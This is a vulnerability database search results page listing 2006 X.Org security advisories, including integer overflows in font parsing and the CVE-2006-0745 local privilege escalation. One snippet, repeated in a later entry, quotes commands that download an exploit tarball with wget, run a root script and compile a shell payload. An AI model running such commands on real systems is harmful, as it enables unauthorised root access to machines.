Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in
🔥 Daily Hot!
💪🏽 CPE Enhanced Advisories
🕶 Shadow Exploits
🕵🏼 Vulners CPE
🔐 Security news
💻 Exploit updates
📑 Blogs review
🐧 Linux vulnerabilities
🐞 Bugbounty
🤖 AI High Score
📰 CVE Feed
show all

7 matches found

seebug.org
seebug.orgadded 2006/11/07 12:0 a.m.17 views

X.Org LibXfont CID字体文件多个整数溢出漏洞

X.Org是X.Org Foundation对X窗口系统的开源实现。 X.Org和XFree86 X server在解析type1模块中的CID编码的Type1字体时缺少验证,远程攻击者可能利用此漏洞在用户机器上执行任意指令。 具体来讲,scancidfont函数在处理CMap和CIDFont字体数据时存在整数溢出漏洞;CIDAFM函数在处理AFM(Adobe Font Metrics)文件时也存在整数溢出漏洞。攻击者可以利用这些漏洞以root权限执行任意指令。 RedHat Linux WS 4 RedHat Linux ES 4 RedHat Linux Desktop 4 RedH...

7.1AI score
Exploits0
seebug.org
seebug.orgadded 2006/10/25 12:0 a.m.26 views

X.Org多个setuid调用返回检查本地权限提升漏洞

X.Org是X.Org Foundation对X窗口系统的开源实现。 X.Org在处理权限放弃操作时存在漏洞,本地攻击者可能利用此漏洞提升自己的权限。 X.Org没有检查setuid或类似的调用是否成功。如果由于“maximum processes”ulimit的限制导致调用失败的话,就会导致进程以root用户权限执行某些特权操作(文件访问)。 X.org X.org 6.7.0 - 7.1 Gentoo已经为此发布了一个安全公告(GLSA-200608-25)以及相应补丁: GLSA-200608-25:X.org and some X.org libraries: Local...

7.1AI score
Exploits0
CVE
CVEadded 2006/03/21 2:0 a.m.104 views

CVE-2006-0745

The CVE concerns the X.Org X Server (xorg-server) 1.0.0 and later (X11R6.9.0, X11R7.0) where a faulty check tests the address of geteuid instead of the function result, allowing a local user to bypass restrictions and perform a Local Privilege Escalation. Impact described across sources: an unpri...

7.2CVSS6.7AI score0.01099EPSS
Exploits4References21Affected Software2
securityvulns
securityvulnsadded 2006/03/21 12:0 a.m.57 views

Re: [CVE-2006-0745] X.Org Security Advisory: privilege escalation and DoS in X11R6.9, X11R7.0

Two second exploit, but if anyone is lazy: $ wget http://metasploit.com/users/hdm/tools/xmodulepath.tgz $ tar -zpxvf xmodulepath.tgz $ cd xmodulepath $ ./root.sh /bin/rm -f exploit.o exploit.so shell .o .so gcc -fPIC -c exploit.c gcc -shared -nostdlib exploit.o -o exploit.so gcc -o shell shell.c ...

7.2CVSS1.6AI score0.01099EPSS
Exploits4
securityvulns
securityvulnsadded 2006/03/21 12:0 a.m.49 views

[CVE-2006-0745] X.Org Security Advisory: privilege escalation and DoS in X11R6.9, X11R7.0

X.Org Security Advisory, March 20th 2006 Local privilege escalation in X.Org server 1.0.0 and later; X11R6.9.0 and X11R7.0 CVE-ID: CVE-2006-0745 Overview: During the analysis of results from the Coverity code review of X.Org, we discovered a flaw in the server that allows local users to execute...

7.2CVSS1.2AI score0.01099EPSS
Exploits4
exploitpack
exploitpackadded 2006/03/20 12:0 a.m.12 views

X.Org X11 (X11R6.9.0X11R7.0) - Local Privilege Escalation

X.Org X11 X11R6.9.0X11R7.0 - Local Privilege Escalation From Daniel Stone's Advisory xorg-server 1.0.0, as shipped with X11R7.0, and all release candidates of X11R7.0, is vulnerable. X11R6.9.0, and all release candidates, are vulnerable. X11R6.8.2 and earlier versions are not vulnerable. The rest...

0.4AI score
Exploits0
Exploit DB
Exploit DBadded 2006/03/20 12:0 a.m.92 views

X.Org X11 (X11R6.9.0/X11R7.0) - Local Privilege Escalation

From Daniel Stone's Advisory xorg-server 1.0.0, as shipped with X11R7.0, and all release candidates of X11R7.0, is vulnerable. X11R6.9.0, and all release candidates, are vulnerable. X11R6.8.2 and earlier versions are not vulnerable. The rest is H D Moore from metasploit Two second exploit, but if...

7.4AI score
Exploits0
Rows per page
Query Builder